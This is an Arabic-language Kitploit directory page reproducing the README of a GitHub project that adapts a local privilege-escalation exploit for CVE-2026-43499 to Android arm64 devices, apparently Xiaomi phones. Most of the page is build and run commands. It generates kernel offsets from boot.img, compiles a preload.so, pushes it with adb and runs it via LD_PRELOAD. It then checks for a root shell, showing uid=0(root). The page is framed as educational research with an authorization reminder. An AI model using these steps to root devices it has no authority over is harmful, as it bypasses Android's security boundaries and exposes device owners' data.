Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43499-Poc-Analysis — تحليل الثغرات وإثبات المفهوم (PoC) لـ CVE-2026-43499 الذي يؤثر على أجهزة Xiaomi. لأغراض تعليمية وبحثية فقط. | Kitploit
أدوات/GitHubGitHub/xianwan1314/cve-2026-43499-poc-analysis
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubxianwan1314/cve-2026-43499-poc-analysis

CVE-2026-43499-Poc-Analysis

تحليل الثغرات وإثبات المفهوم (PoC) لـ CVE-2026-43499 الذي يؤثر على أجهزة Xiaomi. لأغراض تعليمية وبحثية فقط.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
10471منذ شهر واحدلم تتم المراجعة بعد

تكييف رفع الصلاحيات المحلية على Android arm64 لثغرة CVE-2026-43499

English | 中文


هذا مشروع تكييف لرفع الصلاحيات المحلية على Android arm64 لثغرة CVE-2026-43499.

يقوم المشروع بتوليد target.h استنادًا إلى boot.img وملف profile الخاص بالجهاز المستهدف، ثم يُنتج ملف preload.so المطابق بعد الترجمة.

ملاحظة: هذا المشروع هو إطار تكييف عام ولا يرتبط بطراز جهاز واحد. تعتمد قابلية الاستخدام الفعلية على نجاح generate_target.py في توليد target.h وعلى نتائج الاختبار على الجهاز الحقيقي.


هيكل الدليل

root@kitploit:~
项目目录/
├── boot.img                  # 目标设备同固件 boot 镜像
├── profile_xxx.json           # 目标设备 profile
├── detect_offset.py           # 检测 profile 用
├── generate_target.py         # 生成 target.h
├── source/
│   ├── Makefile
│   └── src/
│       └── target.h           # 自动生成
└── source/build/bin/
    └── preload.so             # 编译产物

المتطلبات

المتطلبات الأساسية

root@kitploit:~
Python 3
LLVM / llvm-objdump
Android NDK
make
adb

البيئة الموصى بها على Windows

يُنصح على Windows باستخدام:

root@kitploit:~
MSYS2 UCRT64
Android NDK r29
LLVM Windows x86_64

لتثبيت make داخل MSYS2:

root@kitploit:~
pacman -S make coreutils

تحضير الملفات

تحتاج إلى تحضير:

root@kitploit:~
boot.img
profile_xxx.json

مثال على ملف profile:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

هذان العنوانان في ملف profile:

root@kitploit:~
p0_phys_offset
p0_kernel_phys_load

يمكن الحصول عليهما بتشغيل السكربت على هاتف مرفوع الصلاحيات (Root) ويشغّل نفس البرنامج الثابت (firmware) الخاص بملف boot.img المستهدف:

root@kitploit:~
python3 detect_offset.py

يمكن فعل ذلك أيضًا على Windows:

root@kitploit:~
python detect_offset.py

خطوات الاستخدام

1. الانتقال إلى دليل المشروع

Linux / macOS:

root@kitploit:~
cd /path/to/project

مثال على Windows MSYS2:

root@kitploit:~
cd /d/unlockProject/CVE/CVE-2026-43499-xxxxxx-main

2. تعيين مسار NDK

مثال على Linux / macOS:

root@kitploit:~
export ANDROID_NDK_HOME=/path/to/android-ndk

مثال على Windows MSYS2:

root@kitploit:~
export ANDROID_NDK_HOME=/c/Bin/android-ndk-r29

3. توليد target.h

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_xxx.json \
  -o source/src/target.h

على Windows، إذا لم يكن python3 متاحًا، استخدم:

root@kitploit:~
python generate_target.py \
  --boot boot.img \
  --profile profile_xxx.json \
  -o source/src/target.h

إذا ظهرت رسالة تفيد بتعذر العثور على llvm-objdump، فحدد المسار يدويًا:

root@kitploit:~
python generate_target.py \
  --boot boot.img \
  --profile profile_xxx.json \
  -o source/src/target.h \
  --llvm-objdump "/c/Bin/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"

عند النجاح ستظهر رسالة مشابهة لما يلي:

root@kitploit:~
生成成功: .../source/src/target.h
kernel SHA-256: ...
target macros: ...

4. ترجمة preload.so

Linux / macOS:

root@kitploit:~
make -C source clean preload

Windows MSYS2:

root@kitploit:~
make -C source clean preload NDK_PREBUILT=windows-x86_64

عند النجاح سيتم توليد:

root@kitploit:~
source/build/bin/preload.so

5. الدفع إلى الجهاز وتشغيله

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'

التحقق:

root@kitploit:~
adb shell '/data/local/tmp/su -c id'

عند النجاح سيظهر عادةً ما يلي:

root@kitploit:~
uid=0(root) gid=0(root)

سير العمل الكامل على Windows MSYS2

مثال بناءً على مساراتك:

root@kitploit:~
cd /d/unlockProject/CVE/CVE-2026-43499-annibale-main
export ANDROID_NDK_HOME=/c/Bin/android-ndk-r29
python generate_target.py --boot boot.img --profile profile_xxx.json -o source/src/target.h --llvm-objdump "/c/Bin/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"
make -C source clean preload NDK_PREBUILT=windows-x86_64

الملف النهائي:

root@kitploit:~
source/build/bin/preload.so

الأسئلة الشائعة

تعذر العثور على llvm-objdump

قم بتثبيت LLVM، أو استخدم:

root@kitploit:~
--llvm-objdump "/path/to/llvm-objdump"

تعذر العثور على make

على Windows، قم بالتثبيت باستخدام MSYS2:

root@kitploit:~
pacman -S make coreutils

تعذر العثور على clang

عادةً ما يكون السبب أن مسار NDK غير مضبوط بشكل صحيح.

مثال على Windows MSYS2:

root@kitploit:~
export ANDROID_NDK_HOME=/c/Bin/android-ndk-r29
make -C source clean preload NDK_PREBUILT=windows-x86_64

فشل توليد target.h

يشير ذلك عادةً إلى أن boot.img الحالي أو تخطيط النواة لم يتم تكييفه بنجاح بعد.

ركز على فحص ما يلي:

root@kitploit:~
boot.img 是否完整
profile 是否正确
llvm-objdump 是否可用
内核是否有 IKCONFIG / kallsyms / BTF

ملاحظات

  • بعد تغيير الجهاز أو النظام أو النواة، يلزم إعادة توليد target.h.
  • لا يُنصح بتعديل target.h يدويًا؛ بل يجب توليده تلقائيًا بواسطة generate_target.py.
  • يُرجى استخدامه فقط على الأجهزة والبيئات التي لديك الإذن باستخدامها.
تنزيل الأداة